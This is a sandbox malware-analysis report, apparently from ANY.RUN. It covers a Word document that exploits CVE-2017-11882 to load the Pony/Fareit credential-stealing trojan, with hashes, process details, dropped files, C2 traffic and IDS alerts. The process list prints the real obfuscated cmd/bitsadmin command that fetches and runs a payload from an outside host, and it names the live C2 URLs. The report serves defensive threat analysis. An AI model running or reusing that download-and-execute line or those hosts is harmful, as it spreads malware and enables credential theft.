analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

quotation 4974141.doc

Full analysis: https://app.any.run/tasks/40e56285-d996-4056-bb86-052e4622a38e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 18, 2019, 14:14:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
trojan
pony
fareit
Indicators:
MIME: application/octet-stream
File info: data
MD5:

B27E40488EEC81B513C68353B4234949

SHA1:

468D37A41539BD0F3EDC7D4768F0E3809C2C18B9

SHA256:

E061F9B3EFCC8EA581A5F79D869E9935207D5129D9C95B7ACA91B607739D5307

SSDEEP:

768:5AzXUuvKVBTJcbn0f+f7J4N+akdmmF5KXPXexsz:uDxCFU0RzxmrKX/Vz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3252)
    • Uses BITADMIN.EXE for downloading application

      • cMd.exe (PID: 3932)
    • Application was dropped or rewritten from another process

      • Iu.Exe (PID: 2640)
      • Iu.Exe (PID: 4060)
    • Connects to CnC server

      • Iu.Exe (PID: 4060)
    • Detected Pony/Fareit Trojan

      • Iu.Exe (PID: 4060)
    • Actions looks like stealing of personal data

      • Iu.Exe (PID: 4060)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3252)
      • Iu.Exe (PID: 4060)
    • Application launched itself

      • Iu.Exe (PID: 2640)
  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 3252)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2876)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs bitsadmin.exe no specs iu.exe no specs #PONY iu.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2876"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\quotation 4974141.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3252"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3932cMd /C bitsadmin /transfer 8 /download ht^tp^s:^/^/my.mixtape.moe/ejkhnj.htaa %temp%\Iu.Exe&%temp%\Iu.ExeC:\Windows\system32\cMd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2344bitsadmin /transfer 8 /download https://my.mixtape.moe/ejkhnj.htaa C:\Users\admin\AppData\Local\Temp\Iu.ExeC:\Windows\system32\bitsadmin.execMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2640C:\Users\admin\AppData\Local\Temp\Iu.ExeC:\Users\admin\AppData\Local\Temp\Iu.ExecMd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
KUNECKE
Exit code:
0
Version:
1.07.0001
4060:\Users\admin\AppData\Local\Temp\Iu.ExeC:\Users\admin\AppData\Local\Temp\Iu.Exe
Iu.Exe
User:
admin
Integrity Level:
MEDIUM
Description:
KUNECKE
Exit code:
0
Version:
1.07.0001
3344cmd /c ""C:\Users\admin\AppData\Local\Temp\2244281.bat" "C:\Users\admin\AppData\Local\Temp\Iu.Exe" "C:\Windows\system32\cmd.exeIu.Exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 469
Read events
1 087
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2876WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE795.tmp.cvr
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:22E8A4AE1A0A1860776BCF6275FF1471
SHA256:2C62F759BC2FE08C169E245586DC71777EC845E399074DDA48F9235C61023254
2640Iu.ExeC:\Users\admin\AppData\Local\Temp\~DFA1627B98C17E2A6E.TMPbinary
MD5:384BAEDA4DDE1892FD4CB3E4454A0BCE
SHA256:67E4B3A60908D37D04EDD546E610F2BA85552A6C710514A9B78D8CF51D0E8D39
2876WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$otation 4974141.docpgc
MD5:92854749F765453B0FDBE224E318952E
SHA256:A98525676D508CA825F209753A2E46EE010067E2F48DDD01B55A1A01FAC094F1
4060Iu.ExeC:\Users\admin\AppData\Local\Temp\2244281.battext
MD5:3880EEB1C736D853EB13B44898B718AB
SHA256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4060
Iu.Exe
GET
404
49.51.150.201:80
http://onlygoodman.com/onn/onn.exe
CN
html
209 b
malicious
4060
Iu.Exe
POST
200
49.51.150.201:80
http://onlygoodman.com/onn/gate.php
CN
binary
20 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4060
Iu.Exe
49.51.150.201:80
onlygoodman.com
CN
malicious
206.81.100.99:443
my.mixtape.moe
NapaNet
US
suspicious

DNS requests

Domain
IP
Reputation
my.mixtape.moe
  • 206.81.100.99
unknown
onlygoodman.com
  • 49.51.150.201
malicious

Threats

PID
Process
Class
Message
4060
Iu.Exe
A Network Trojan was detected
ET TROJAN Fareit/Pony Downloader Checkin 2
4060
Iu.Exe
Potential Corporate Privacy Violation
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
4060
Iu.Exe
Potential Corporate Privacy Violation
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
4060
Iu.Exe
A Network Trojan was detected
ET TROJAN Trojan Generic - POST To gate.php with no referer
4060
Iu.Exe
A Network Trojan was detected
MALWARE [PTsecurity] Pony encrypted POST Data Request
4060
Iu.Exe
A Network Trojan was detected
ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
4060
Iu.Exe
A Network Trojan was detected
MALWARE [PTsecurity] Pony encrypted C2 Response
4060
Iu.Exe
A Network Trojan was detected
MALWARE [PTsecurity] Fareit/Pony CnC Server stdResponse
4060
Iu.Exe
A Network Trojan was detected
ET TROJAN Fareit/Pony Downloader Checkin 3
4060
Iu.Exe
Potential Corporate Privacy Violation
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
4 ETPRO signatures available at the full report
No debug info